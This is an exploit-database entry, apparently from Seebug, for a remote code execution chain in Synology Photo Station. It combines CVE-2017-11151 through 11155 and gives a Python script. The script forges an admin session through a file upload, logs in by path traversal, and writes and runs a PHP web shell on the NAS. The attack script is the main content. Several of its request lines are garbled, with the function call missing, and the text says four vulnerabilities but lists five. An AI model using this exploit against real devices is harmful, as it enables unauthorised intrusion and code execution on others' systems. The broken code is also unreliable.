Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution

ID SSV:96600
Type seebug
Reporter Root
Modified 2017-09-29T00:00:00


Description: The remote code execution is a combination of 4 different vulnerabilities:

CVE-2017-11151 allows remote attackers to upload arbitrary files to the specified directories.

CVE-2017-11152 allows remote attackers to log in with a fake authentication mechanism.

CVE-2017-11153 allows remote attackers to log in to Photo Station with any identities.

CVE-2017-11154 allows remote authenticated attackers with administrator privileges in Photo Station to execute arbitrary codes on the vulnerable NAS.

CVE-2017-11155 allows remote attackers to identify whether Photo Station is vulnerable or not.

The chain of vulnerabilities will allow you, in the end, to execute code as:

uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)

                                                import requests
# What server you want to attack
synology_ip = ''
# Your current IP
ip = ''
# PHP code you want to execute
php_to_execute = '<?php echo system("id"); ?>'
encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'
print "[+] Set fake admin sesssion"
file = [('file', ('foo.jpg', encoded_session))]
r ='{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
print r.text
print "[+] Login as fake admin"
# Depends on version it might be stored in different dirs
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}
try_login ='{}/photo/include/file_upload.php'.format(synology_ip), params=payload)
whichact = {'action' : 'get_setting'}
r ='{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
print r.text
print "[+] Upload php file"
c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
r ='{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
print r.text
print "[+] Execute payload"
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))
print f.text